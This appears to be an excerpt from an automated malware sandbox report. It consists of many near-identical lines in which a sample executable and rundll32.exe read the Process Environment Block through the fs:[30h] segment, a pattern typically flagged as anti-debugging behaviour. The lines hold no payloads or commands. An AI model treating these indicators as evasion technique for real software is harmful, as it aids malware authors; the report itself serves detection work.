Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3A70E mov eax, dword ptr fs:[00000030h] 1_2_00A3A70E
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3A70E mov eax, dword ptr fs:[00000030h] 1_2_00A3A70E
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2F716 mov eax, dword ptr fs:[00000030h] 1_2_00A2F716
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A9FF10 mov eax, dword ptr fs:[00000030h] 1_2_00A9FF10
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A9FF10 mov eax, dword ptr fs:[00000030h] 1_2_00A9FF10
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1FF60 mov eax, dword ptr fs:[00000030h] 1_2_00A1FF60
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD8F6A mov eax, dword ptr fs:[00000030h] 1_2_00AD8F6A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1EF40 mov eax, dword ptr fs:[00000030h] 1_2_00A1EF40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462746D mov eax, dword ptr fs:[00000030h] 6_2_0462746D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463A44B mov eax, dword ptr fs:[00000030h] 6_2_0463A44B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469C450 mov eax, dword ptr fs:[00000030h] 6_2_0469C450
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469C450 mov eax, dword ptr fs:[00000030h] 6_2_0469C450
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463BC2C mov eax, dword ptr fs:[00000030h] 6_2_0463BC2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D740D mov eax, dword ptr fs:[00000030h] 6_2_046D740D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D740D mov eax, dword ptr fs:[00000030h] 6_2_046D740D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D740D mov eax, dword ptr fs:[00000030h] 6_2_046D740D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h] 6_2_04686C0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h] 6_2_04686C0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h] 6_2_04686C0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h] 6_2_04686C0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C14FB mov eax, dword ptr fs:[00000030h] 6_2_046C14FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686CF0 mov eax, dword ptr fs:[00000030h] 6_2_04686CF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686CF0 mov eax, dword ptr fs:[00000030h] 6_2_04686CF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686CF0 mov eax, dword ptr fs:[00000030h] 6_2_04686CF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D8CD6 mov eax, dword ptr fs:[00000030h] 6_2_046D8CD6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461849B mov eax, dword ptr fs:[00000030h] 6_2_0461849B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462C577 mov eax, dword ptr fs:[00000030h] 6_2_0462C577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462C577 mov eax, dword ptr fs:[00000030h] 6_2_0462C577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04643D43 mov eax, dword ptr fs:[00000030h] 6_2_04643D43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04683540 mov eax, dword ptr fs:[00000030h] 6_2_04683540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04627D50 mov eax, dword ptr fs:[00000030h] 6_2_04627D50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460AD30 mov eax, dword ptr fs:[00000030h] 6_2_0460AD30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CE539 mov eax, dword ptr fs:[00000030h] 6_2_046CE539
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04634D3B mov eax, dword ptr fs:[00000030h] 6_2_04634D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04634D3B mov eax, dword ptr fs:[00000030h] 6_2_04634D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04634D3B mov eax, dword ptr fs:[00000030h] 6_2_04634D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D8D34 mov eax, dword ptr fs:[00000030h] 6_2_046D8D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0468A537 mov eax, dword ptr fs:[00000030h] 6_2_0468A537
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461D5E0 mov eax, dword ptr fs:[00000030h] 6_2_0461D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461D5E0 mov eax, dword ptr fs:[00000030h] 6_2_0461D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CFDE2 mov eax, dword ptr fs:[00000030h] 6_2_046CFDE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CFDE2 mov eax, dword ptr fs:[00000030h] 6_2_046CFDE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CFDE2 mov eax, dword ptr fs:[00000030h] 6_2_046CFDE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CFDE2 mov eax, dword ptr fs:[00000030h] 6_2_046CFDE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B8DF1 mov eax, dword ptr fs:[00000030h] 6_2_046B8DF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h] 6_2_04686DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h] 6_2_04686DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h] 6_2_04686DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686DC9 mov ecx, dword ptr fs:[00000030h] 6_2_04686DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h] 6_2_04686DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h] 6_2_04686DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D05AC mov eax, dword ptr fs:[00000030h] 6_2_046D05AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D05AC mov eax, dword ptr fs:[00000030h] 6_2_046D05AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046335A1 mov eax, dword ptr fs:[00000030h] 6_2_046335A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04631DB5 mov eax, dword ptr fs:[00000030h] 6_2_04631DB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04631DB5 mov eax, dword ptr fs:[00000030h] 6_2_04631DB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04631DB5 mov eax, dword ptr fs:[00000030h] 6_2_04631DB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04632581 mov eax, dword ptr fs:[00000030h] 6_2_04632581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04632581 mov eax, dword ptr fs:[00000030h] 6_2_04632581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04632581 mov eax, dword ptr fs:[00000030h] 6_2_04632581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04632581 mov eax, dword ptr fs:[00000030h] 6_2_04632581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h] 6_2_04602D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h] 6_2_04602D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h] 6_2_04602D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h] 6_2_04602D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h] 6_2_04602D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463FD9B mov eax, dword ptr fs:[00000030h] 6_2_0463FD9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463FD9B mov eax, dword ptr fs:[00000030h] 6_2_0463FD9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461766D mov eax, dword ptr fs:[00000030h] 6_2_0461766D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h] 6_2_0462AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h] 6_2_0462AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h] 6_2_0462AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h] 6_2_0462AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h] 6_2_0462AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h] 6_2_04617E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h] 6_2_04617E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h] 6_2_04617E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h] 6_2_04617E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h] 6_2_04617E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h] 6_2_04617E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CAE44 mov eax, dword ptr fs:[00000030h] 6_2_046CAE44
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CAE44 mov eax, dword ptr fs:[00000030h] 6_2_046CAE44
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460E620 mov eax, dword ptr fs:[00000030h] 6_2_0460E620
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046BFE3F mov eax, dword ptr fs:[00000030h] 6_2_046BFE3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460C600 mov eax, dword ptr fs:[00000030h] 6_2_0460C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460C600 mov eax, dword ptr fs:[00000030h] 6_2_0460C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460C600 mov eax, dword ptr fs:[00000030h] 6_2_0460C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04638E00 mov eax, dword ptr fs:[00000030h] 6_2_04638E00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1608 mov eax, dword ptr fs:[00000030h] 6_2_046C1608
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463A61C mov eax, dword ptr fs:[00000030h] 6_2_0463A61C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463A61C mov eax, dword ptr fs:[00000030h] 6_2_0463A61C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046316E0 mov ecx, dword ptr fs:[00000030h] 6_2_046316E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046176E2 mov eax, dword ptr fs:[00000030h] 6_2_046176E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04648EC7 mov eax, dword ptr fs:[00000030h] 6_2_04648EC7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046BFEC0 mov eax, dword ptr fs:[00000030h] 6_2_046BFEC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046336CC mov eax, dword ptr fs:[00000030h] 6_2_046336CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D8ED6 mov eax, dword ptr fs:[00000030h] 6_2_046D8ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D0EA5 mov eax, dword ptr fs:[00000030h] 6_2_046D0EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D0EA5 mov eax, dword ptr fs:[00000030h] 6_2_046D0EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D0EA5 mov eax, dword ptr fs:[00000030h] 6_2_046D0EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046846A7 mov eax, dword ptr fs:[00000030h] 6_2_046846A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469FE87 mov eax, dword ptr fs:[00000030h] 6_2_0469FE87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461FF60 mov eax, dword ptr fs:[00000030h] 6_2_0461FF60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D8F6A mov eax, dword ptr fs:[00000030h] 6_2_046D8F6A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461EF40 mov eax, dword ptr fs:[00000030h] 6_2_0461EF40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04604F2E mov eax, dword ptr fs:[00000030h] 6_2_04604F2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04604F2E mov eax, dword ptr fs:[00000030h] 6_2_04604F2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463E730 mov eax, dword ptr fs:[00000030h] 6_2_0463E730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D070D mov eax, dword ptr fs:[00000030h] 6_2_046D070D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D070D mov eax, dword ptr fs:[00000030h] 6_2_046D070D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463A70E mov eax, dword ptr fs:[00000030h] 6_2_0463A70E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463A70E mov eax, dword ptr fs:[00000030h] 6_2_0463A70E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462F716 mov eax, dword ptr fs:[00000030h] 6_2_0462F716
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469FF10 mov eax, dword ptr fs:[00000030h] 6_2_0469FF10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469FF10 mov eax, dword ptr fs:[00000030h] 6_2_0469FF10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046437F5 mov eax, dword ptr fs:[00000030h] 6_2_046437F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04618794 mov eax, dword ptr fs:[00000030h] 6_2_04618794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04687794 mov eax, dword ptr fs:[00000030h] 6_2_04687794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04687794 mov eax, dword ptr fs:[00000030h] 6_2_04687794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04687794 mov eax, dword ptr fs:[00000030h] 6_2_04687794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D1074 mov eax, dword ptr fs:[00000030h] 6_2_046D1074
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C2073 mov eax, dword ptr fs:[00000030h] 6_2_046C2073
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04620050 mov eax, dword ptr fs:[00000030h] 6_2_04620050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04620050 mov eax, dword ptr fs:[00000030h] 6_2_04620050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461B02A mov eax, dword ptr fs:[00000030h] 6_2_0461B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461B02A mov eax, dword ptr fs:[00000030h] 6_2_0461B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461B02A mov eax, dword ptr fs:[00000030h] 6_2_0461B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461B02A mov eax, dword ptr fs:[00000030h] 6_2_0461B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463002D mov eax, dword ptr fs:[00000030h] 6_2_0463002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463002D mov eax, dword ptr fs:[00000030h] 6_2_0463002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463002D mov eax, dword ptr fs:[00000030h] 6_2_0463002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463002D mov eax, dword ptr fs:[00000030h] 6_2_0463002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463002D mov eax, dword ptr fs:[00000030h] 6_2_0463002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D4015 mov eax, dword ptr fs:[00000030h] 6_2_046D4015
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D4015 mov eax, dword ptr fs:[00000030h] 6_2_046D4015
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04687016 mov eax, dword ptr fs:[00000030h] 6_2_04687016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04687016 mov eax, dword ptr fs:[00000030h] 6_2_04687016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04687016 mov eax, dword ptr fs:[00000030h] 6_2_04687016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046058EC mov eax, dword ptr fs:[00000030h] 6_2_046058EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0469B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469B8D0 mov ecx, dword ptr fs:[00000030h] 6_2_0469B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0469B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0469B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0469B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0469B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h] 6_2_046320A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h] 6_2_046320A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h] 6_2_046320A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h] 6_2_046320A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h] 6_2_046320A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h] 6_2_046320A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046490AF mov eax, dword ptr fs:[00000030h] 6_2_046490AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463F0BF mov ecx, dword ptr fs:[00000030h] 6_2_0463F0BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463F0BF mov eax, dword ptr fs:[00000030h] 6_2_0463F0BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463F0BF mov eax, dword ptr fs:[00000030h] 6_2_0463F0BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609080 mov eax, dword ptr fs:[00000030h] 6_2_04609080
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04683884 mov eax, dword ptr fs:[00000030h] 6_2_04683884
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04683884 mov eax, dword ptr fs:[00000030h] 6_2_04683884
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460C962 mov eax, dword ptr fs:[00000030h] 6_2_0460C962
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460B171 mov eax, dword ptr fs:[00000030h] 6_2_0460B171
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460B171 mov eax, dword ptr fs:[00000030h] 6_2_0460B171
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462B944 mov eax, dword ptr fs:[00000030h] 6_2_0462B944
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462B944 mov eax, dword ptr fs:[00000030h] 6_2_0462B944
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04624120 mov eax, dword ptr fs:[00000030h] 6_2_04624120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04624120 mov eax, dword ptr fs:[00000030h] 6_2_04624120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04624120 mov eax, dword ptr fs:[00000030h] 6_2_04624120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04624120 mov eax, dword ptr fs:[00000030h] 6_2_04624120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04624120 mov ecx, dword ptr fs:[00000030h] 6_2_04624120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463513A mov eax, dword ptr fs:[00000030h] 6_2_0463513A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463513A mov eax, dword ptr fs:[00000030h] 6_2_0463513A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609100 mov eax, dword ptr fs:[00000030h] 6_2_04609100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609100 mov eax, dword ptr fs:[00000030h] 6_2_04609100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609100 mov eax, dword ptr fs:[00000030h] 6_2_04609100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046941E8 mov eax, dword ptr fs:[00000030h] 6_2_046941E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460B1E1 mov eax, dword ptr fs:[00000030h] 6_2_0460B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460B1E1 mov eax, dword ptr fs:[00000030h] 6_2_0460B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460B1E1 mov eax, dword ptr fs:[00000030h] 6_2_0460B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046361A0 mov eax, dword ptr fs:[00000030h] 6_2_046361A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046361A0 mov eax, dword ptr fs:[00000030h] 6_2_046361A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046869A6 mov eax, dword ptr fs:[00000030h] 6_2_046869A6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046851BE mov eax, dword ptr fs:[00000030h] 6_2_046851BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046851BE mov eax, dword ptr fs:[00000030h] 6_2_046851BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046851BE mov eax, dword ptr fs:[00000030h] 6_2_046851BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046851BE mov eax, dword ptr fs:[00000030h] 6_2_046851BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462C182 mov eax, dword ptr fs:[00000030h] 6_2_0462C182
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463A185 mov eax, dword ptr fs:[00000030h] 6_2_0463A185
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04632990 mov eax, dword ptr fs:[00000030h] 6_2_04632990
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046BB260 mov eax, dword ptr fs:[00000030h] 6_2_046BB260
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046BB260 mov eax, dword ptr fs:[00000030h] 6_2_046BB260
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D8A62 mov eax, dword ptr fs:[00000030h] 6_2_046D8A62
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0464927A mov eax, dword ptr fs:[00000030h] 6_2_0464927A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609240 mov eax, dword ptr fs:[00000030h] 6_2_04609240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609240 mov eax, dword ptr fs:[00000030h] 6_2_04609240
